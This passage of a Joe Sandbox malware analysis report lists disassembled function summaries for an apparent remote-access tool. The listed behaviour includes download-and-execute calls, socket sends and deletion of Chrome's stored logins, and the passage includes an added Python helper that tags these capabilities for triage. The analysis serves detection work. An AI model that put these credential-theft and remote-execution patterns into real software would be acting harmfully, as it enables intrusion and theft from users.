                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                              • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                              • API String ID: 2127411465-314212984
                                              • Opcode ID: 906faeb5203d37c74ddcedaba27fd20c986479be3f450a41c0319093749beec0
                                              • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                              • Opcode Fuzzy Hash: 906faeb5203d37c74ddcedaba27fd20c986479be3f450a41c0319093749beec0
                                              • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                              Strings
                                              • open, xrefs: 00406FF1
                                              • C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe, xrefs: 00407042, 0040716A
                                              • 0aF, xrefs: 0040712C
                                              • 0aF, xrefs: 0040701B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DownloadExecuteFileShell
                                              • String ID: 0aF$0aF$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$open
                                              • API String ID: 2825088817-1546693839
                                              • Opcode ID: e2ffd63addb94ba147d74eaf4cb76dc7edd8d28aacd664d9fcd8ebc301bfbf31
                                              • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                              • Opcode Fuzzy Hash: e2ffd63addb94ba147d74eaf4cb76dc7edd8d28aacd664d9fcd8ebc301bfbf31
                                              • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040884C
                                              • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                              • String ID: xdF
                                              • API String ID: 1771804793-999140092
                                              • Opcode ID: f4b51b2c778cc903a76b83995408fe472956efc0dc2707ff349452219b6188ab
                                              • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                              • Opcode Fuzzy Hash: f4b51b2c778cc903a76b83995408fe472956efc0dc2707ff349452219b6188ab
                                              • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                              APIs
                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                              • GetLastError.KERNEL32 ref: 0040BA93
                                              Strings
                                              • UserProfile, xrefs: 0040BA59
                                              • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteErrorFileLast
                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                              • API String ID: 2018770650-1062637481
                                              • Opcode ID: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
                                              • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                              • Opcode Fuzzy Hash: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
                                              • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                              • GetLastError.KERNEL32 ref: 004179D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3534403312-3733053543
                                              • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                              • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                              • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                              • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00409293
                                                • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                              • FindClose.KERNEL32(00000000), ref: 004093FC
                                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                              • FindClose.KERNEL32(00000000), ref: 004095F4
                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                              • String ID:
                                              • API String ID: 1824512719-0
                                              • Opcode ID: 59e39cceb89accd49a364b67fce820dfbb3b5ce655084222bcfd4fd7aa577296
                                              • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                              • Opcode Fuzzy Hash: 59e39cceb89accd49a364b67fce820dfbb3b5ce655084222bcfd4fd7aa577296
                                              • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                              • String ID:
                                              • API String ID: 276877138-0
                                              • Opcode ID: d2aae47141dcf0d9b89d10f0773cee60e0a3b0657566105474702d9dbd979937
                                              • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                              • Opcode Fuzzy Hash: d2aae47141dcf0d9b89d10f0773cee60e0a3b0657566105474702d9dbd979937
                                              • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
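The function summaries above each pair a short API list with a handful of strings: Firefox profile enumeration ending in cookies.sqlite (ref 0040C3D6), the GetKeyboardState/ToUnicodeEx keystroke translation (ref 0040A451), the URLDownloadToFileW/ShellExecuteW pair (ref 00406FF7), deletion of the Chrome "Login Data" database (ref 0040BA89), the SeShutdownPrivilege adjustment (ref 0041799A), the service start via OpenSCManagerW/StartServiceW (ref 0041AAE4) and the runtime resolution of Shlwapi!SHDeleteKeyW (ref 004142A5). The Python below is an added triage helper, not Joe Sandbox code and not part of this report: it parses entries in the report's "APIs" / "Strings" / "String ID" / "Opcode ID" format into API and string sets and maps them to capability tags, so the same pattern can be checked across many functions or many reports. The rule table and tag names are this example's assumptions; the embedded sample is a trimmed excerpt of the entries shown above.

```python
"""Triage helper added alongside this Joe Sandbox report (not Joe Sandbox's own code).
Parses per-function 'APIs' / 'Strings' / 'String ID' / 'Opcode ID' lines and maps each
function to capability tags. RULES is an assumption of this example."""
import re
from dataclasses import dataclass, field

# Excerpt of four entries from this report, trimmed to the lines the parser uses.
SAMPLE = """\
APIs
• FindFirstFileW.KERNEL32(00000000,?,\\Mozilla\\Firefox\\Profiles\\,00000000), ref: 0040C3D6
• FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
• FindClose.KERNEL32(00000000), ref: 0040C4B8
• String ID: AppData$\\Mozilla\\Firefox\\Profiles\\$\\cookies.sqlite
• Opcode ID: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
APIs
• GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
• GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
• ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
• String ID:
• Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
• open, xrefs: 00406FF1
• Opcode ID: e2ffd63addb94ba147d74eaf4cb76dc7edd8d28aacd664d9fcd8ebc301bfbf31
APIs
• DeleteFileA.KERNEL32(00000000,\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data), ref: 0040BA89
• GetLastError.KERNEL32 ref: 0040BA93
• \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data, xrefs: 0040BA54
• [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
• Opcode ID: 8d1b9c386d9f6ca777f4705084fddfe26be0f649cbc95c9792bf321ed182c299
"""

# Bullet rows: direct calls and "Part of subcall function X:" calls both carry Name.MODULE.
API_RE = re.compile(r"^\s*[•\-]\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"([A-Za-z_][\w@]*)\.([A-Z0-9_]+)(?=[\s(])")
OPCODE_RE = re.compile(r"^\s*[•\-]\s*Opcode ID:\s*([0-9a-f]{64})")
STRID_RE = re.compile(r"^\s*[•\-]\s*String ID:\s*(.*)$")   # '$'-joined string list
XREF_RE = re.compile(r"^\s*[•\-]\s*(.*?), xrefs: ")        # individual string rows

# (tag, API names that must all be present, string fragments that must all be present)
RULES = [
    ("firefox_cookie_access", {"FindFirstFileW"}, {"\\Mozilla\\Firefox\\Profiles", "cookies.sqlite"}),
    ("chrome_login_data_tamper", {"DeleteFileA"}, {"\\Google\\Chrome\\User Data\\Default\\Login Data"}),
    ("keystroke_translation", {"GetForegroundWindow", "GetKeyboardState", "ToUnicodeEx"}, set()),
    ("download_and_execute", {"URLDownloadToFileW", "ShellExecuteW"}, set()),
    ("shutdown_privilege", {"LookupPrivilegeValueA", "AdjustTokenPrivileges"}, {"SeShutdownPrivilege"}),
    ("service_start", {"OpenSCManagerW", "StartServiceW"}, set()),
    ("dynamic_api_resolution", {"LoadLibraryA", "GetProcAddress"}, {"SHDeleteKeyW"}),
]


@dataclass
class FunctionSummary:
    apis: set = field(default_factory=set)
    strings: set = field(default_factory=set)
    opcode_id: str = ""
    tags: list = field(default_factory=list)


def parse_report(text):
    """One FunctionSummary per 'APIs' header; rows before the first header are ignored."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionSummary()
            entries.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            cur.apis.add(m.group(1))
        elif (m := OPCODE_RE.match(line)):
            cur.opcode_id = m.group(1)
        elif (m := STRID_RE.match(line)):
            cur.strings.update(s for s in m.group(1).split("$") if s)
        elif (m := XREF_RE.match(line)):
            cur.strings.add(m.group(1))
    return entries


def tag_entry(entry):
    """Attach every rule whose APIs and string fragments are all present in the entry."""
    for tag, apis, frags in RULES:
        if apis <= entry.apis and all(any(f in s for s in entry.strings) for f in frags):
            entry.tags.append(tag)
    return entry.tags


def triage(text):
    entries = parse_report(text)
    for e in entries:
        tag_entry(e)
    return entries


def capability_profile(entries):
    """tag -> Opcode IDs of the functions carrying it, for pivoting to other samples."""
    profile = {}
    for e in entries:
        for t in e.tags:
            profile.setdefault(t, []).append(e.opcode_id)
    return profile
```

Running `capability_profile(triage(SAMPLE))` yields one tag per sample entry, each keyed to the function's Opcode ID; on the full report the same Opcode IDs can be searched across other Joe Sandbox reports to find functions with identical code regardless of how the payload was packed. Rules require every listed API and fragment so that a lone FindFirstFileW or DeleteFileA in an unrelated function does not fire.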
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                              • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                              • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                              • String ID: v%(/
                                              • API String ID: 4212172061-2435473048
                                              • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                              • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                              • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                              • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                              • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: ACP$OCP
                                              • API String ID: 2299586839-711371036
                                              • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                              • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                              • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                              • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNextsend
                                              • String ID: 8eF$XPG$XPG
                                              • API String ID: 4113138495-4157548504
                                              • Opcode ID: 7a5c3d9e14cb1f5e3befbd9a80a8d16349b8335561f890dc7847aff180d4e2e3
                                              • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                              • Opcode Fuzzy Hash: 7a5c3d9e14cb1f5e3befbd9a80a8d16349b8335561f890dc7847aff180d4e2e3
                                              • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                              APIs
                                               • SystemParametersInfoW.USER32(00000014 [SPI_SETDESKWALLPAPER],00000000,00000000,00000003 [SPIF_UPDATEINIFILE|SPIF_SENDWININICHANGE]), ref: 0041CB68
                                                • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137E1
                                                • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.3 Pro), ref: 004137EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateInfoParametersSystemValue
                                              • String ID: ,aF$Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                              • API String ID: 4127273184-3126330168
                                              • Opcode ID: 66999e3142bd33a62fa1d08061f300942aa72122ed75466f2ef34f9b656b6348
                                              • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                              • Opcode Fuzzy Hash: 66999e3142bd33a62fa1d08061f300942aa72122ed75466f2ef34f9b656b6348
                                              • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                              APIs
                                               • FindResourceA.KERNEL32(SETTINGS,0000000A [RT_RCDATA],00000000), ref: 0041B54A
                                              • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                              • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                              • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID: SETTINGS
                                              • API String ID: 3473537107-594951305
